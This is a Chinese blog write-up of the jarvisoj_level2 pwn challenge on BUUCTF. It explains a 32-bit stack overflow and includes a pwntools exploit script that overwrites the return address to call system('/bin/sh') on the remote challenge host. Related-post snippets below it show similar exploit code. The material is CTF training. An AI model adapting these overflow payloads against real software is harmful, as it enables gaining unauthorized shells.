jarvisoj_level2题解

于 2023-01-08 16:46:44 发布
阅读量253 收藏
点赞数
分类专栏: Pwn 文章标签: 安全 学习 其他 经验分享 c语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/OrientalGlass/article/details/128602732
版权
文章详细介绍了如何通过checksec和ida分析程序存在栈溢出漏洞,然后利用该漏洞构造payload,将返回地址指向callsystem函数,并设置栈顶元素为/bin/sh的地址,以实现远程执行系统命令获取flag的过程。
摘要由CSDN通过智能技术生成

1.checksec查看

 2.ida查看,很显然这里有栈溢出

 3.查看栈

 4.寻找system和bin/sh

这题没有现成的system("/bin/sh")可以调用,但是有system函数和/bin/sh字符串

所以可以通过溢出修改返回函数为call system位置,并且将栈顶元素修改为/bin/sh所在地址

这样就可以成功执行system("/bin/sh")

 

 5.脚本

from pwn import * 
context.log_level='debug' 
p=remote("node4.buuoj.cn",26250)
payload=b'a'*136+b'b'*4+p32(0x804849e)+p32(0x804a024)
#填充掉return的地址到call system函数的位置,并将栈顶修改为/bin/sh所在地址
p.send(payload)		
p.interactive()

6.获取flag

 

 

OrientalGlass
关注
专栏目录
BUUCTF jarvisoj_level0
m0_54262894的博客
10-27 317
先checksec,仅开启了NX保护 运行一下 放入ida中 查看main函数 没有什么关键信息,双击vulnerable_function() 在这里我们看到了漏洞 buf定义了80个字节,而我们可以输入更多的数据 接着找找后门函数 这道题很简单,已经把后门给我们展示出来了 记住后门函数的地址0x400596 做完以上步骤我们就有思路了: 覆盖buf 的80个字节 因为是64位的文件,然后再加8个字节...
pwn题解level(2)
qq_43627239的博客
07-25 595
今天oj里边的level2和level3的32位和64位四道题 写一下32位 其中包含libc 写题解之前 先补充两个内容 1.checksec 是用来检查可执行文件属性的。 Arch:说明这个文件的属性是什么,说明是32位的程序。 Stack:canary,这个主要是说栈保护的东西,所利用的东西就是相当于网站的cookie,linux中把这种cookie信息称为canary,所以如果开...
jarvisoj_level2
m0_55086916的博客
11-29 669
第一个p32(0x08048320)是function函数的返回地址,第二个是system函数的返回地址,p32(0x0804a024)是system函数的第一个参数。注意到这里可以利用栈溢出漏洞,buf数组只给了0x88的大小,但是最多可以读入0x100个字节的数据,所以多读入的数据就会向下把栈给覆盖掉。于是想把function函数的返回地址覆盖成system函数的入口地址,然后把参数改成"bin/sh"字符串的地址。
【CTF题解NO.00004】BUUCTF/BUUOJ - Pwn write up by arttnb3
arttnba3的博客
11-20 1357
GITHUB BLOG LINK THERE 文章目录[GITHUB BLOG LINK THERE](https://archive.next.arttnba3.cn/2020/09/08/%E3%80%90CTF%E9%A2%98%E8%A7%A3-0x04%E3%80%91BUUOJ-Pwn-write-up-by-arttnb3/)0x000.绪论0x001.test your nc - nc0x002.rip - ret2text0x003.warmup_csaw_2016 - ret2text0
个人网站大总结合集—持续更新,欢迎共享,不要白嫖哦
01-20
https://www.jarvisoj.com/challenges 纯英文,不带题解,题目分类 https://adworld.xctf.org.cn/ 攻防世界,中文,带题解 Paper https://paper.seebug.org/category/bin-security/各种CTF的...
BUUCTF【pwn】解题记录(1-3页已完结)
Assassin
05-05 1960
文章目录ripwarmup_csaw_2016ciscn_2019_n_1pwn1_sctf_2016jarvisoj_level0ciscn_2019_c_1(栈溢出+ret2libc+plt调用)[第五空间2019 决赛]PWN5ciscn_2019_n_8jarvisoj_level2[OGeek2019]babyropbjdctf_2020_babystackget_started_3dsctf_2016(mprotect+read+shellcode)cn_2019_en_2jarvisoj_le
[CTF]jarvisoj_level2
凉水的博客
01-12 516
解题思路 反编译后的源码: undefined4 main(void) { vulnerable_function(); system("echo \'Hello World!\'"); return 0; } void vulnerable_function(void) { undefined local_8c [136]; system("echo Input:"); read(0,local_8c,0x100); return; } 看完上面的反编译,直觉system函数
[buuctf]jarvisoj_level2
逆向萌新的博客
06-19 508
[buuctf]jarvisoj_level2
[BUUCTF]PWN------jarvisoj_level2
BangSen1的博客
01-20 326
jarvisoj_level2 例行检查,32bit,开启NX保护。 nc 一下 ,Hello world,没什么信息 用32位IDA打开,看到了/bin/sh,跟进一下。 想查看调用函数的,但是看不了,所幸地址已经给出,所以shell_addr=0x804A024 system_addr=0x8048320 直接利用这些构造 system(/bin/sh)去执行 找到输入点 buf的大小是0x88,读入的数据大小是0x100,多余空间足以构造rop exp flag ...
【BUUCTF - PWN】jarvisoj_level2
古月浪子的博客
04-05 676
checksec一下,栈溢出 IDA打开看看,很容易找到溢出点,/bin/sh字符串程序里也有现成的 from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_level='debug' sl=lambda x:io.sendline(x) ru=lamb...
[BUUCTF-pwn]——jarvisoj_level2
Y_peak的博客
02-10 868
[BUUCTF-pwn]——jarvisoj_level2 题目地址:https://buuoj.cn/challenges#jarvisoj_level2 checksec 一下下, 32程序 IDA中看下,发现了system函数还是两个,有可利用的栈溢出read函数,shift+F12,还发现了"/bin/sh"字符串. 所以exploit就如下 exploit from pwn import * p = remote("node3.buuoj.cn",28375) binsh = 0
BUUCTF jarvisoj_level2
、moddemod
06-12 549
exp from pwn import * context(log_level = 'debug') proc_name = './level2' p = process(proc_name) # p = remote('node3.buuoj.cn', 26643) elf = ELF(proc_name) system_addr = elf.sym['system'] main_addr = elf.sym['main'] bin_sh_str = 0x0804a024 payload = 'a'..
bugkuctfweb题解simple_ssti_2
最新发布
03-16
simple_ssti_2 是一道 Bugku CTF 网络安全比赛中的 Web 题目,它是一个简单的 SSTI(Server-Side Template Injection)漏洞题目。在这个题目中,我们需要通过注入一些恶意代码来获取 flag。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

OrientalGlass

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值